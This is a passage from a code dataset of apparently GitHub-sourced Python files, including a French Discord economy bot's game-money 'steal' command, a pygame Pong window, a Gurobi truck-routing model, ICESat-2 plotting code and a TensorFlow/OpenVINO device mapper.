time_last_steal[0] + 3_600 <= time.time(): # 1 heure de delais entre chaques voles\n db.update_value(table_name, \n \"time_last_steal\",\n float(time.time()),\n \"id_discord\",\n id)\n return True\n else:\n return False\n \n \n \n \n \nasync def steal(ctx, user):\n \"\"\"steal money\n\n Arguments:\n ctx {context} -- ...\n user {discord.User} -- user who lose his money\n \"\"\"\n if ctx.message.author == user:\n await em_error(ctx, \"vous ne pouvez pas vous voulez vous même\")\n return None\n \n success = add_steal_in_db(ctx.message.author.id, time.time())\n if success:\n global is_catch\n rand_int_try = randint(1, 10)\n if rand_int_try != 5:\n print(\"stealing\")\n amount = randint(1, 100)\n await em_call_back(ctx, ctx.message.author.name + \" a voler de l'argent a : \" + user.name,\n description=user.mention + \"fait la command !catch \" + ctx.message.author.mention +\" pour l'envoyer en prison\") #todo finish taht\n is_catch[ctx.message.author] = False\n await asyncio.sleep(60) \n try:\n catch = is_catch[ctx.message.author]\n except KeyError:\n catch = True\n if not catch : \n await em_call_back(ctx, ctx.message.author.name+ \" a reussi son vole, il gagne donc \"+ amount+ \"€\")\n # steal money\n \n # todo verifier que l'argent ne passe pas en negatif\n if db.search(\"argent_user\", \"id_discord\", user.id, \"argent\")-amount >=0:\n db.add_money(user.id, -amount) # retirer l'argent\n db.add_money(ctx.message.author.id, amount)\n else:\n print(user.name, \"a eu les yeux plus gros que le ventre\")\n await em_error(ctx, \"la personne que vous vollez n'as pas asser d'argent\")\n else:\n return None\n else: \n print(ctx.message.author.name, \" a rater son vole, il part en prison\") \n await em_jail(ctx)\n db.update_value(\"steal_history\", \"time_last_steal\", 0, \"id_discord\", ctx.message.author.name)\n else:\n await em_error(ctx, \"vous devez vous reposer au moins 1h entre chaques voles\")\n \n ","repo_name":"plapla-1357/bot_discord","sub_path":"argent.py","file_name":"argent.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"46091860088","text":"__author__ = 'admin'\nimport gevent\nfrom gevent.event import Event\nevt = Event()\ndef setter():\n\tprint(\"A:hey wat for me I havet to do something\")\n\tgevent.sleep(3)\n\tprint(\"Ok, I'm done\")\n\tevt.set()\n\ndef waiter():\n\tprint(\"I'll wait for your\")\n\tevt.wait()\n\tprint(\"It's abount time\")\n\ndef main():\n\tgevent.joinall([\n\t\tgevent.spawn(setter),\n\t\tgevent.spawn(waiter),\n\t\tgevent.spawn(waiter),\n\t\tgevent.spawn(waiter),\n\t])\nif __name__ == '__main__': main()\n\n\n\n","repo_name":"cluo/learingPython","sub_path":"gevent_lab/gevent_event.py","file_name":"gevent_event.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"2265096875","text":"import pygame\nimport config as cfg\n\n\nclass Window:\n def __init__(self):\n self._window = pygame.display.set_mode((cfg.WIDTH, cfg.HEIGHT))\n \n def draw_maze(self):\n # Top line\n pygame.draw.line(self._window, cfg.WHITE, (0, 0), (cfg.WIDTH, 0), 5)\n # Bottom line\n pygame.draw.line(self._window, cfg.WHITE, (0, cfg.HEIGHT), (cfg.WIDTH, cfg.HEIGHT), 5)\n # Left line\n pygame.draw.line(self._window, cfg.WHITE, (0, 0), (0, cfg.HEIGHT), 5)\n # Right line\n pygame.draw.line(self._window, cfg.WHITE, (cfg.WIDTH, 0), (cfg.WIDTH, cfg.HEIGHT), 5)\n # Middle line\n pygame.draw.line(self._window, cfg.WHITE, (cfg.WIDTH//2, 0), (cfg.WIDTH//2, cfg.HEIGHT), 5)\n\n def draw_start(self):\n start = cfg.FONT.render('Press R to start the game', False, cfg.WHITE)\n start_rect = start.get_rect(center=(cfg.WIDTH/2, (cfg.HEIGHT/2)))\n\n self._window.blit(start, start_rect)\n\n def draw_pause_screen(self):\n bg = pygame.Surface((cfg.WIDTH, cfg.HEIGHT), pygame.SRCALPHA)\n bg.fill((0,0,0,128))\n \n pause = cfg.FONT.render('PAUSED', False, cfg.WHITE)\n pause_rect = pause.get_rect(center=(cfg.WIDTH/2, (cfg.HEIGHT/2)))\n\n self._window.blit(bg, (0,0))\n self._window.blit(pause, pause_rect)\n\n def draw_end_game_screen(self, winner):\n end_info = cfg.FONT.render(f'GAME OVER! Player {winner} wins!', False, cfg.WHITE)\n end_rect = end_info.get_rect(center=(cfg.WIDTH/2, (cfg.HEIGHT/2)-50))\n \n restart = cfg.FONT.render('Press R to play again!',False, cfg.WHITE)\n restart_rect = restart.get_rect(center=(cfg.WIDTH/2, (cfg.HEIGHT/2)))\n \n game_quit = cfg.FONT.render('Press Q to quit',False, cfg.WHITE)\n game_quit_rect = game_quit.get_rect(center=(cfg.WIDTH/2, (cfg.HEIGHT/2)+50))\n\n self._window.blit(end_info, end_rect)\n self._window.blit(restart, restart_rect)\n self._window.blit(game_quit, game_quit_rect)\n\n def draw_object(self, object):\n pygame.draw.rect(self._window, cfg.WHITE, object.hitbox())\n\n def draw_scores(self, p1, p2):\n s1 = cfg.FONT.render(f'{p1.score()}', False, cfg.WHITE)\n s2 = cfg.FONT.render(f'{p2.score()}', False, cfg.WHITE)\n self._window.blit(s1, ((cfg.WIDTH//2)-35, 10))\n self._window.blit(s2, ((cfg.WIDTH//2)+20, 10))\n\n def display(self, player1, player2, ball, game_in_progress, paused, finished, winner, count, goal):\n self._window.fill(cfg.BG_COLOR)\n if game_in_progress:\n if count:\n self.display_countdown(count)\n elif goal:\n self.display_goal()\n else:\n self.draw_maze()\n self.draw_object(player1)\n self.draw_object(player2)\n self.draw_object(ball)\n self.draw_scores(player1, player2)\n if paused:\n self.draw_pause_screen()\n else:\n if finished:\n self.draw_end_game_screen(winner)\n else:\n self.draw_start()\n pygame.display.update()\n \n def display_countdown(self, c):\n countdown = cfg.FONT.render(f'{c}', False, cfg.WHITE)\n countdown_rect = countdown.get_rect(center=(cfg.WIDTH/2, (cfg.HEIGHT/2)))\n\n self._window.blit(countdown, countdown_rect)\n pygame.display.update()\n \n def display_goal(self):\n goal = cfg.FONT.render('GOOOOOOOAL!', False, cfg.WHITE)\n goal_rect = goal.get_rect(center=(cfg.WIDTH/2, (cfg.HEIGHT/2)))\n\n self._window.blit(goal, goal_rect)\n pygame.display.update()\n","repo_name":"AugustoC3sar/Pong-Pygame","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14446339624","text":"\"\"\"\nRuns the treeVAE model.\n\"\"\"\nimport argparse\nfrom pathlib import Path\nimport distutils\n\nfrom train.train import run_experiment\nfrom utils.utils import prepare_config\n\n\ndef main():\n project_dir = Path(__file__).absolute().parent\n print(\"Project directory:\", project_dir)\n\n parser = argparse.ArgumentParser()\n\n # Model parameters\n parser.add_argument('--data_name', type=str, help='the dataset')\n parser.add_argument('--num_epochs', type=int, help='the number of training epochs')\n parser.add_argument('--num_epochs_finetuning', type=int, help='the number of finetuning epochs')\n parser.add_argument('--num_epochs_intermediate_fulltrain', type=int, help='the number of finetuning epochs during training')\n parser.add_argument('--num_epochs_smalltree', type=int, help='the number of sub-tree training epochs')\n\n parser.add_argument('--num_clusters_data', type=int, help='the number of clusters in the data')\n parser.add_argument('--num_clusters_tree', type=int, help='the max number of leaves of the tree')\n\n parser.add_argument('--kl_start', type=float, nargs='?', const=0.,\n help='initial KL divergence from where annealing starts')\n parser.add_argument('--decay_kl', type=float, help='KL divergence annealing')\n parser.add_argument('--latent_dim', type=str, help='specifies the latent dimensions of the tree')\n parser.add_argument('--mlp_layers', type=str, help='specifies how many layers should the MLPs have')\n\n parser.add_argument('--grow', type=lambda x: bool(distutils.util.strtobool(x)), help='whether to grow the tree')\n parser.add_argument('--augment', type=lambda x: bool(distutils.util.strtobool(x)), help='augment images or not')\n parser.add_argument('--augmentation_method', type=str, help='none vs simple augmentation vs contrastive approaches')\n parser.add_argument('--aug_decisions_weight', type=float,\n help='weight of similarity regularizer for augmented images')\n parser.add_argument('--compute_ll', type=lambda x: bool(distutils.util.strtobool(x)),\n help='whether to compute the log-likelihood')\n\n # Other parameters\n parser.add_argument('--save_model', type=lambda x: bool(distutils.util.strtobool(x)),\n help='specifies if the model should be saved')\n parser.add_argument('--eager_mode', type=lambda x: bool(distutils.util.strtobool(x)),\n help='specifies if the model should be run in graph or eager mode')\n parser.add_argument('--num_workers', type=int, help='number of workers in dataloader')\n parser.add_argument('--seed', type=int, help='random number generator seed')\n parser.add_argument('--wandb_logging', type=str, help='online, disabled, offline enables logging in wandb')\n\n # Specify config name\n parser.add_argument('--config_name', default='mnist', type=str,\n choices=['mnist', 'fmnist', 'news20', 'omniglot', 'cifar10', 'cifar100', 'celeba'],\n help='the override file name for config.yml')\n\n args = parser.parse_args()\n configs = prepare_config(args, project_dir)\n run_experiment(configs)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lauramanduchi/treevae-pytorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"23935798830","text":"nPrime = int(input('소수의 개수--->'))\n\nk = 0\nn = 2\nL = []\nwhile k != nPrime:\n for i in range(2, n):\n if not n % i: break\n else:\n L.append(n)\n k += 1\n n += 1\n\nprint(\"{0}개의 소수, L = {1}\".format(k, L))\n","repo_name":"paulham98/python_examples","sub_path":"com/week1/ex_3_32_.py","file_name":"ex_3_32_.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26412966029","text":"import gurobipy as gp\nfrom gurobipy import GRB\nimport openpyxl\nimport Classes\nimport time\nfrom itertools import product\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\n# import file\nfile = 'Test_Daten_2.xlsx'\nplatoon = False\n\nD, C, N, V, CN, K, S, A, c_d, Q, c_f, v, d, a, q, K_max, Tw_max, Td_max, n_f, n_d, c_l, t_s, coord, sets, parameter = Classes.read_data(file)\n\ntotal_demand = sum([q[i] for i in C])\n\n# definition of variables\nm = gp.Model('VRP_TPMDSD')\nprint(A)\nx = m.addVars(A, K, vtype=GRB.BINARY, name='x')\ny = m.addVars(C, K, vtype=GRB.CONTINUOUS, lb=0, name='y')\nt = m.addVars(V, K, vtype=GRB.CONTINUOUS, lb=0, name='t')\ntw = m.addVars(D, K, vtype=GRB.CONTINUOUS, lb=0, name='tw')\nz = m.addVars(K, vtype=GRB.BINARY, name='z')\ns = m.addVars(V, K, vtype=GRB.BINARY, name='s')\np = m.addVars(A, K, K, S, vtype=GRB.BINARY, name='p')\npl = m.addVars(A, K, S, vtype=GRB.BINARY, name='pl')\npf = m.addVars(A, K, vtype=GRB.BINARY, name='pf')\nps = m.addVars(A, S, vtype=GRB.CONTINUOUS, lb=0, name='ps')\no = m.addVars(A, K, S, vtype=GRB.BINARY, name='o')\n\nvar_list = [x, y, t, tw, z, s, p, pl, pf, ps, o]\n\n# subject to constraints\n# network flow\nm.addConstrs((gp.quicksum(x[i, j, k] for i in V if (i, j) in A for k in K) <= 1 for j in C),\n name='only one visit per customer')\nm.addConstrs(\n (gp.quicksum(x[i, j, k] for j in V if (i, j) in A) == gp.quicksum(x[j, i, k] for j in V if (i, j) in A) for k in K\n for i in V), name='flow conservation')\ntime_propagation = m.addConstrs(\n (t[j, k] >= t[i, k] + x[i, j, k] * d[i, j] / v[k] + s[j, k] * t_s[j] - Tw_max * (1 - x[i, j, k]) for i in CN for j\n in V if (i, j) in A for k in K), name='time propagation')\nm.addConstrs(\n (t[j, k] >= tw[i, k] + x[i, j, k] * d[i, j] / v[k] + s[j, k] * t_s[j] - Tw_max * (1 - x[i, j, k]) for i in D for j\n in V if (i, j) in A for k in K), name='time propagation depot')\nm.addConstrs((tw[i, k] <= t[i, k] for i in D for k in K), name='limit for waiting time')\nm.addConstrs((t[i, k] <= 2 * Tw_max * gp.quicksum(x[i, j, k] for j in V if (i, j) in A) for i in V for k in K),\n name='time to 0')\nm.addConstrs((tw[i, k] <= Tw_max * gp.quicksum(x[i, j, k] for j in V if (i, j) in A) for i in D for k in K),\n name='wait time to 0')\nm.addConstrs((gp.quicksum(x[i, j, k] for i in D for j in V if (i, j) in A) == z[k] for k in K),\n name='exactly one depot')\n\n# restrictions\nm.addConstrs((gp.quicksum(y[i, k] for k in K) == q[i] for i in C), name='demand fulfillment')\nm.addConstrs((gp.quicksum(y[i, k] for i in C) <= Q[k] for k in K), name='truck capacity')\nm.addConstrs((y[i, k] <= Q[k] * gp.quicksum(x[i, j, k] for j in V if (i, j) in A) for k in K for i in C),\n name='only serve when visit')\nm.addConstrs((y[i, k] <= Q[k] * s[i, k] for i in C for k in K), name='customer serving')\nm.addConstrs((gp.quicksum(s[i, k] for i in C) <= Q[k] * z[k] for k in K), name='truck usage')\nm.addConstrs((gp.quicksum(d[i, j] / v[k] * (x[i, j, k] - n_d * pf[i, j, k]) for (i, j) in A) <= Td_max for k in K),\n name='max driving time')\nm.addConstrs((t[i, k] - tw[i, k] <= Tw_max for i in D for k in K), name='max working time')\n\n# --- platoon formation ---\nif platoon:\n m.addConstrs(\n (x[i, j, k] + x[i, j, l] >= 2 * gp.quicksum(p[i, j, k, l, s] for s in S) for (i, j) in A for k in K for l in K if\n l != k), name='platoon formation')\n m.addConstrs(\n (t[i, k] - t[i, l] <= Tw_max * (1 - gp.quicksum(p[i, j, k, l, s] for s in S)) for i in CN for j in V if (i, j) in A\n for k in K for l in K if k != l), name='start time of platoon')\n m.addConstrs(\n (tw[i, k] - tw[i, l] <= 2 * Tw_max * (1 - gp.quicksum(p[i, j, k, l, s] for s in S)) for i in D for j in V if (i, j) in A\n for k in K for l in K if k != l), name='start time of platoon')\n m.addConstrs((p[i, j, k, l, s] == p[i, j, l, k, s] for (i, j) in A for k in K for l in K if k != l for s in\n S), name='pairwise platoons')\n m.addConstrs(\n ((s - 1) * o[i, j, k, s] == gp.quicksum(p[i, j, k, l, s] for l in K if k != l) for (i, j) in A for k in K for s in\n S), name='size of platoon')\n m.addConstrs((gp.quicksum(o[i, j, k, s] for s in S) <= 1 for (i, j) in A for k in K), name='only one platoon per arc')\n m.addConstrs((s * ps[i, j, s] == gp.quicksum(o[i, j, k, s] for k in K) for (i, j) in A for s in S),\n name='size of platoon')\n m.addConstrs((gp.quicksum(pl[i, j, k, s] for k in K) == ps[i, j, s] for (i, j) in A for s in S),\n name='number platoon leader')\n m.addConstrs((pl[i, j, k, s] <= o[i, j, k, s] for (i, j) in A for k in K for s in S), name='platoon leader')\n m.addConstrs((pf[i, j, k] <= gp.quicksum(o[i, j, k, s] for s in S) for (i, j) in A for k in K), name='platoon follower')\n m.addConstrs((pf[i, j, k] + gp.quicksum(pl[i, j, k, s] for s in S) <= 1 for (i, j) in A for k in K),\n name='position in platoon')\n m.addConstrs((tw[g, k] <= Tw_max * gp.quicksum(o[i, j, k, s] for (i, j) in A for s in S) for g in D for k in K),\n name='wait time at depot')\n\n# objective function\nfuel_cost = gp.quicksum(c_f[k] * d[i, j] * (x[i, j, k] - n_f * pf[i, j, k]) for (i, j) in A for k in K)\nlabor_cost = gp.quicksum(c_l * (t[i, k] - tw[i, k]) for i in D for k in K)\ndepreciation_cost = gp.quicksum(c_d[k] * z[k] for k in K)\nm.setObjective(fuel_cost + labor_cost + depreciation_cost, GRB.MINIMIZE)\n\n# lazy constraints\nfor k in K:\n for i in CN:\n for j in V:\n if (i, j) in A:\n time_propagation[i, j, k].Lazy = 1\n\nm._countLazy = 0\nm.Params.MIPGap = 0.05\n# m.Params.LazyConstraints = 1\nm._var_list = var_list\nm._sets = sets\nm._para = parameter\nm.optimize()\n\nprint(f'{m._countLazy} lazy contraints were added')\n\nif m.Status == GRB.OPTIMAL or m.Status == GRB.INTERRUPTED:\n edges = {key: x[key].x for key in x if x[key].x > 0.5}\n delivered = {key: y[key].x for key in y if y[key].x > 0.5}\n trucks = [key for key in z if z[key].x > 0.5]\n\n print(f'fuel cost: {fuel_cost.getValue()}')\n print(f'labor cost: {labor_cost.getValue()}')\n print(f'depecreation cost: {depreciation_cost.getValue()}')\n\n print('Used Arcs:')\n for k in K:\n for (i, j) in A:\n if x[i, j, k].x >= 0.5:\n print(f'{(i, j, k)}: {x[i, j, k].x}')\n\n # print routes\n edges_truck = {k: dict() for k in K}\n for (i, j, k) in edges.keys():\n edges_truck[k].update({i: j})\n\n routes = dict()\n for k, i in edges_truck.items():\n if len(i) > 0:\n s = list(set(D).intersection(list(i.keys())))\n if len(s) > 0:\n s = s[0]\n else:\n s = list(i.keys())[0]\n route = [s, i[s]]\n while i[s] != route[0]:\n s = i[s]\n route.append(i[s])\n routes[k] = route\n\n for k, v in routes.items():\n print(f'Route {k}: {v}')\n\n print(delivered)\n print(trucks)\n\n for i in D:\n plt.scatter(coord[i][0], coord[i][1], c='b')\n plt.text(coord[i][0], coord[i][1], i, c='b')\n\n for i in C:\n plt.scatter(coord[i][0], coord[i][1], c='g')\n plt.text(coord[i][0], coord[i][1], i, c='g')\n\n for i in N:\n plt.scatter(coord[i][0], coord[i][1], c='r')\n plt.text(coord[i][0], coord[i][1], i, c='r')\n\n colors = {K[k]: list(mcolors.TABLEAU_COLORS.values())[k] for k in range(len(K))}\n width = {K[k]: (len(K) - k) / 2 for k in range(len(K))}\n for k in K:\n for (i, j) in A:\n if (i, j, k) in edges:\n plt.plot([coord[i][0], coord[j][0]], [coord[i][1], coord[j][1]], colors[k], linewidth=width[k])\n\n plt.show()\nelse:\n print('no feasible solution found.')\n","repo_name":"Marsupilami231/Masterthesis","sub_path":"GurobiModel.py","file_name":"GurobiModel.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73068882086","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport glob, pyproj, os, h5py\nimport numpy as np\ntry:\n import pointCollection as pc\nexcept:\n print('Continuing without pointCollection.')\nimport matplotlib.pyplot as plt\n\ndef plot_measures_along_track_comparison(rgt, beams, out_path, correlation_threshold, spatial_extent, plot_out_location, map_data_root,\n velocity_number, close=False):\n \"\"\"\n\n :param rgt:\n :param out_path: path to folder where data written out by the correlation step is saved; data is re-loaded in this step\n :param correlation_threshold:\n :param plot_out_location:\n :param map_data_root:\n :param velocity_number:\n :param close:\n :return:\n \"\"\"\n # currently just the first velocity determination, veloc0\n # out_path is where the xcorr results are stored\n # plot_out_location is where to save the plot\n # map_data_root is where the map data are stored, specifically must contain moa_2009_1km.tif for this specific code to work\n\n file = out_path + 'rgt' + rgt + '_veloc' + str(velocity_number).zfill(\n 2) + '.hdf5' # < eventually, make velocity number two digits\n\n if glob.glob(file):\n\n ### MOA parameters\n moa_datapath = map_data_root # '/srv/tutorial-data/land_ice_applications/'\n # spatial_extent = np.array([-102, -76, -98, -74.5])\n # spatial_extent = np.array([-65, -86, -55, -81])\n\n lat = spatial_extent[[1, 3, 3, 1, 1]]\n lon = spatial_extent[[2, 2, 0, 0, 2]]\n # project the coordinates to Antarctic polar stereographic\n xy = np.array(pyproj.Proj(3031)(lon, lat))\n # get the bounds of the projected coordinates\n XR = [np.nanmin(xy[0, :]), np.nanmax(xy[0, :])]\n YR = [np.nanmin(xy[1, :]), np.nanmax(xy[1, :])]\n MOA = pc.grid.data().from_geotif(os.path.join(moa_datapath, 'moa_2009_1km.tif'), bounds=[XR, YR])\n # MOA=pc.grid.data().from_geotif(os.path.join(moa_datapath, 'MOA','moa_2009_1km.tif'), bounds=[XR, YR])\n\n epsg = 3031 # PS?\n\n plt.close('all')\n fig = plt.figure(figsize=[11, 8])\n grid = plt.GridSpec(6, 2, wspace=0.4, hspace=0.3)\n haxMOA = fig.add_subplot(grid[0:4, 1])\n MOA.show(ax=haxMOA, cmap='gray', clim=[14000, 17000])\n\n with h5py.File(file, 'r') as f:\n for ib, beam in enumerate(beams):\n hax0 = fig.add_subplot(grid[ib, 0])\n # 1hax1=fig.add_subplot(212)\n # hax1.set_title('measures ' )\n if ib == 0:\n hax0.set_title('velocs vs measures ' + rgt)\n\n lats = f[f'/{beam}/latitudes'][()]\n lons = f[f'/{beam}/longitudes'][()]\n coeffs = f[f'/{beam}/correlation_coefficients'][()]\n velocs = f[f'/{beam}/velocities'][()]\n v_along = f[f'/{beam}/Measures_v_along'][()]\n xy = np.array(pyproj.proj.Proj(3031)(lons, lats))\n\n ixs0 = coeffs <= correlation_threshold\n ixs = coeffs > correlation_threshold\n\n h0 = hax0.scatter(xy[0], velocs, 1, coeffs, vmin=0, vmax=1, cmap='viridis')\n h1 = hax0.plot(xy[0], v_along, 'k-')\n # whether v_along is + or - must depend on ascending vs descending; not done correctly yet\n\n hax0.set_ylim(-800, 800)\n c = plt.colorbar(h0, ax=hax0)\n c.set_label('Correlation coefficient (0 -> 1)')\n\n h2 = haxMOA.scatter(xy[0][ixs0], xy[1][ixs0], 0.02, 'k')\n h3 = haxMOA.scatter(xy[0][ixs], xy[1][ixs], 0.15, velocs[ixs], vmin=-800, vmax=800, cmap='plasma')\n\n c = plt.colorbar(h3, ax=haxMOA)\n c.set_label('Along-track velocity (m/yr)')\n\n outfile = plot_out_location + 'rgt' + rgt + '.' + beam + '_vs_measures_veloc' + str(velocity_number).zfill(\n 2) + '.png'\n plt.savefig(outfile, dpi=200)\n if close == True:\n plt.close('all')\n","repo_name":"ICESAT-2HackWeek/IS2_velocity","sub_path":"IS2_velocity/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"21208098566","text":"import os\nimport logging\nfrom threading import RLock\nfrom typing import Callable, List\n\nimport tensorflow as tf\nfrom tensorflow.python.client import device_lib\n\n_devices = None\n_devices_lock = RLock()\n\n\ndef get_all_devices() -> List[str]:\n \"\"\"Returns a list of devices in the computer. Example:\n ['CPU:0', 'XLA_GPU:0', 'XLA_CPU:0', 'GPU:0', 'GPU:1', 'GPU:2', 'GPU:3']\n \"\"\"\n global _devices, _devices_lock\n\n # Initialize the device list if necessary\n with _devices_lock:\n if _devices is None:\n # Use the TF_FORCE_GPU_ALLOW_GROWTH=true environment variable to\n # force allow tensorflow to take up GPU memory dynamically, instead\n # of allocating 100% of memory at first model-load.\n #\n # TODO: Use tf.config.list_physical_devices in TF 2.1\n\n with tf.compat.v1.Session():\n all_devices = device_lib.list_local_devices()\n\n # Get the device names and remove duplicates, just in case...\n tf_discovered_devices = {\n d.name.replace(\"/device:\", \"\")\n for d in all_devices\n }\n\n # Discover devices using OpenVINO\n try:\n from openvino.inference_engine import IECore\n ie = IECore()\n openvino_discovered_devices = {\n d for d in ie.available_devices\n if not d.lower().startswith(\"cpu\")\n }\n except ModuleNotFoundError:\n logging.warning(\"OpenVINO library not found. \"\n \"OpenVINO devices will not be discovered. \")\n openvino_discovered_devices = set()\n _devices = list(tf_discovered_devices\n | openvino_discovered_devices)\n return _devices\n\n\nclass DeviceMapper:\n def __init__(self, filter_func: Callable[[List[str]], List[str]]):\n \"\"\"The filter will take in a list of devices formatted as\n [\"CPU:0\", \"CPU:1\", \"GPU:0\", \"GPU:1\"], etc and output a filtered list of\n devices.\n \"\"\"\n self.filter_func = filter_func\n\n @staticmethod\n def map_to_all_gpus(cpu_fallback=True) -> 'DeviceMapper':\n def filter_func(devices):\n gpu_devices = [d for d in devices if d.startswith(\"GPU:\")]\n if not gpu_devices and cpu_fallback:\n return [\"CPU:0\"]\n return gpu_devices\n\n return DeviceMapper(filter_func=filter_func)\n\n @staticmethod\n def map_to_single_cpu() -> 'DeviceMapper':\n def filter_func(devices):\n return [next(d for d in devices if d.startswith(\"CPU:\"))]\n\n return DeviceMapper(filter_func=filter_func)\n\n @staticmethod\n def map_to_openvino_devices():\n \"\"\"Intelligently load capsules onto available OpenVINO-compatible\n devices.\n\n Since support for OpenVINO devices is experimental, there is a\n temporary environment variable being added to whitelist devices\n specifically. This variable will be deprecated and removed after a\n short testing period.\n\n The device \"CPU\" is _always_ allowed and always loaded onto and cannot\n be excluded.\n\n Here are the cases:\n ['CPU:0', 'HDDL', ...] => [\"MULTI:CPU,HDDL\"]\n\n ['CPU:0'] => [\"CPU\"]\n Always load onto CPU.\n \"\"\"\n\n def filter_func(devices):\n\n devices_by_priority = os.environ.get(\n \"OPENVINO_DEVICE_PRIORITY\",\n \"CPU,HDDL\").split(\",\")\n load_to_devices = []\n\n for device in devices_by_priority:\n for existing_device in devices:\n if existing_device.lower().startswith(device.lower()):\n load_to_devices.append(device)\n\n if len(load_to_devices) > 1:\n return [\"MULTI:\" + \",\".join(load_to_devices)]\n else:\n return load_to_devices\n\n return DeviceMapper(filter_func=filter_func)\n","repo_name":"opencv/open_vision_capsules","sub_path":"vcap/vcap/device_mapping.py","file_name":"device_mapping.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"52"} +{"seq_id":"39497564497","text":"\"\"\"\n단어 뒤집기 2\n\n문제\n문자열 S가 주어졌을 때, 이 문자열에서 단어만 뒤집으려고 한다.\n\n먼저, 문자열 S는 아래와과 같은 규칙을 지킨다.\n\n알파벳 소문자('a'-'z'), 숫자('0'-'9'), 공백(' '), 특수 문자('<', '>')로만 이루어져 있다.\n문자열의 시작과 끝은 공백이 아니다.\n'<'와 '>'가 문자열에 있는 경우 번갈아가면서 등장하며, '<'이 먼저 등장한다. 또, 두 문자의 개수는 같다.\n태그는 '<'로 시작해서 '>'로 끝나는 길이가 3 이상인 부분 문자열이고, '<'와 '>' 사이에는 알파벳 소문자와 공백만 있다. 단어는 알파벳 소문자와 숫자로 이루어진 부분 문자열이고, 연속하는 두 단어는 공백 하나로 구분한다. 태그는 단어가 아니며, 태그와 단어 사이에는 공백이 없다.\n\n입력\n첫째 줄에 문자열 S가 주어진다. S의 길이는 100,000 이하이다.\n\n출력\n첫째 줄에 문자열 S의 단어를 뒤집어서 출력한다.\n\"\"\"\n### 문자열을 stack에 뒤집어서 추가해주는 함수\ndef reversed_func(reversed_list, stack):\n while len(reversed_list) != 0:\n stack.append(reversed_list.pop())\n\n\ndef solve(string, pos):\n stack, temp = [], []\n for i in string:\n if i == '<':\n pos = True\n if temp: # temp에 문자열이 있을 때\n reversed_func(temp, stack)\n if pos:\n stack.append(i)\n if i == '>': pos = False\n else:\n temp.append(i)\n if i == ' ':\n r_list = temp[:-1] # 공백을 제외한 reverse 해줄 문자열\n blank = temp[-1:]\n reversed_func(r_list, stack)\n stack.append(blank[0]) # stack에 공백 추가\n temp = []\n\n if temp: # 만약에 temp에 남은 문자열이 있을 경우\n reversed_func(temp, stack)\n return ''.join(stack)\n\n\nif __name__ == \"__main__\":\n import sys\n input = sys.stdin.readline\n\n string = input().rstrip()\n pos = False\n print(solve(string, pos))","repo_name":"TetorCo/daliy_commit_backjoon","sub_path":"220226_17413.py","file_name":"220226_17413.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31446039328","text":"class Aplicacao:\n def __init__(self, nome, capital, tempo, taxaJuros, montante,juros):\n self.nome = nome\n self.capital = capital\n self.tempo = tempo\n self.taxaJuros = taxaJuros\n self.montante = montante\n self.juros = juros\n\n def entrada(self):\n self.nome = input(\"Digite seu nome: \")\n self.capital = float(input(\"Digite a quantia em reais a ser investida: \"))\n self.tempo = int(input(\"Digite a quantidade de meses que seu dinheiro ficará investido\"))\n self.taxaJuros = (float(input(\"Digite a taxa de juros anual: \"))/100)/12\n\n def saida(self):\n print()\n","repo_name":"DouglasAparecidoVasconcelos/python-compara-investimentos","sub_path":"aplicacao.py","file_name":"aplicacao.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71921909924","text":"class Solution(object):\n def construct2DArray(self, original, m, n):\n \"\"\"\n :type original: List[int]\n :type m: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n ans = []\n if not len(original) - m * n:\n for i in range(m):\n ans.append(original[i * n:(i + 1) * n])\n return ans\n","repo_name":"yoohaythem/LeetCode_Python","sub_path":"2022每日一题/一月/(01.01) 2022. 将一维数组转变成二维数组.py","file_name":"(01.01) 2022. 将一维数组转变成二维数组.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22573945977","text":"H = W = 100\nframe = [[] for _ in range(H)]\n\n# 회문 검사\ndef palindrome(word):\n leng = len(word)\n for c in range(int(leng/2)):\n if word[c] != word[-(c+1)]:\n return -1\n return 1\n\nfor ts in range(10):\n T = int(input())\n print('#%d'%T, end=' ')\n max_len = 1\n \n for i in range(H):\n frame[i] = input()\n \n for ll in range(2,(H+1)):\n for aa in range(H):\n for bb in range(H-ll+1):\n word = frame[aa][bb:bb+ll]\n if palindrome(word) == 1:\n max_len = ll\n break\n word = ''\n for cc in range(ll):\n word = word + frame[bb+cc][aa]\n if palindrome(word) == 1:\n max_len = ll\n if max_len == ll:\n break\n print(max_len)","repo_name":"1002ever/algorithm_sol","sub_path":"swexpert/1216_palindrome2.py","file_name":"1216_palindrome2.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7043760904","text":"import packit\nfrom packit import topmod as module\n# Loading module topmod from package Packit ...\n# Loading package Packit 